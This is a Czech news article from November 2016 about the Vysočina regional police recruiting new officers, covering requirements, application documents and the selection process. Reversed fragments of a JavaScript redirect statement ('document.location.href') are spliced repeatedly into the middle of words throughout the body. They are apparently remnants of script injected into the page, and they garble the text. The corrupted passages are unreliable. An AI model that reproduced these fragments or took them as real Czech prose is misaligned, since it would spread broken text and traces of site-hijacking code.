Rainbow page separator

Policie na Vysočině bude přijímat nové členy i příští rok

Pátek, 18. listopadu 2016

Policejní auto, policie, měření rychlosti

Vysočina / Krajské ředitelství policie Kraje Vysočina stále přijímá do svých řad nové policisty. Le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tos jich nas[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toupilo celkem 69. „Krajské ředitelství nabízí mladým lidem, kteří mají minimálně středoškolské vzdělání ukončené maturitní zkouškou, jsou fyzicky i psychicky zdatní a odvážní, možnost stát se příslušníkem Policie České republiky,“ uvedla krajská policejní mluvčí Dana Čírtková. Nyní je v kraji ve služebním poměru 1294 policistů a policistek, z [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toho je 147 žen a věkový průměr podle mluvčí činí necelých 39 let.
„Noví policisté budou působit v rámci útvarů krajského ředitelství, a [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to v poho[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovostním a eskortním oddělení, dálničním oddělení ve Velkém Beranově a obvodních odděleních nebo dopravních inspek[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];torátech v kraji,“ sdělila mluvčí. Zájemce o přijetí k policii musí být starší 18 let věku, bezúhonný a zdravotně, osobnostně a fyzicky způsobilý k výkonu služby. Nesmí být členem politické strany nebo hnutí a nemůže vykonávat živnostenskou i jinou výdělečnou činnost. „Přijímací řízení je zahájeno doručením písemné žádosti o přijetí do služebního poměru. Při pohovoru předkládá uchazeč občanský průkaz, živo[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];topis, osobní dotazník, rodný list a doklady o nejvyšším dosaženém vzdělání a dosavadní praxi. Řízení trvá dva měsíce a v jeho průběhu uchazeč absolvuje psychologické vyšetření, prověrku tělesné zdatnosti i zdravotní prohlídku,“ dodala mluvčí. Bližší informace zájemci získají u krajských personalistů prostřednictvím webu www.policie.cz.